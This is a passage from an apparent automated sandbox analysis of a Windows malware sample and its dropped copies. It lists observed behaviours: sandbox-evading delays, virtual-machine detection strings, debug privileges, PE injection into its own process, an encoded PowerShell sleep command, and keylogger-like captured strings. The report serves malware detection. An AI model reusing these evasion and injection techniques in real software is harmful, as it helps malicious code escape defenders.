              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193150Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193006Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192887Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192772Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192647Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1200000
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198890
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198343
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198203
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197874
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197561
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197296
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197077
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196949
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196593
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196390
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195843
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195587
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195093
              Source: Oefdyik.exe, 0000001B.00000002.519934856.00000000011B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll096
              Source: kDPmkTm.exe, 00000011.00000002.520665643.000000000126D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: izwFjkhFJm.exe, 0000000F.00000003.344564244.0000000001519000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Encrypted powershell cmdline option found
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: Base64 decoded start-sleep -seconds 20
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeMemory written: C:\Users\user\Desktop\izwFjkhFJm.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeMemory written: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exeJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exeJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exeJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp, izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r{Win}
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r{Win}r
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Users\user\Desktop\izwFjkhFJm.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Users\user\Desktop\izwFjkhFJm.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
